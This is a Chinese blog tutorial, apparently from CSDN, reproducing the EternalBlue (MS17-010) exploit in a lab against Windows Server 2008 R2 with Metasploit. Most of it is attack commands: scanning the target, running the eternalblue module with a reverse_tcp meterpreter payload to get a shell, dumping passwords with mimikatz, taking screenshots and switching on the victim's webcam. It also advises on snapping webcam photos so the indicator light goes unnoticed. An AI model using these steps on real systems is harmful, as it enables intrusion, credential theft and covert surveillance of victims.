永恒之蓝复现(CVE-2017-0146)

测试环境

靶机 Server 2008 R2
攻击机kali

操作步骤

1、启动msf

msfconsole

在这里插入图片描述
2、搜索 ms17-010 模块

search ms17-010

在这里插入图片描述
1、利用模块1来检测是否有此漏洞

use auxiliary/scanner/smb/smb_ms17_010 
set rhost 受害者IP
run

在这里插入图片描述

2、利用模块2来进行攻击
查看需要配置的信息

use exploit/windows/smb/ms17_010_eternalblue 
show options

在这里插入图片描述
设置受害者的IP:

set rhost 受害者IP

设置监听者IP

set lhost 监听者KaliIP

设置payload

set payload windows/x64/meterpreter/reverse_tcp

启动 run 或exploit

run

拿shell
在这里插入图片描述
解决乱码情况

chcp 65001

在这里插入图片描述

在Meterpreter上的一些别的操作

1、截屏

screenshot

在这里插入图片描述
2、获取系统密码
加载mimikatz模块

load mimikatz

在这里插入图片描述
获取用户密码

wdigest

在这里插入图片描述
3、开启摄像头
检测有没有摄像头

webcam_list

在这里插入图片描述
打开摄像头

webcam_stream

打开摄像头,灯会一直亮着,容易被发现
在这里插入图片描述
Ctrl + C 退出,(关闭摄像头)
在这里插入图片描述
拍照

webcam_snap

拍照,摄像头的灯只是一闪而过。没那么容易发现
在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值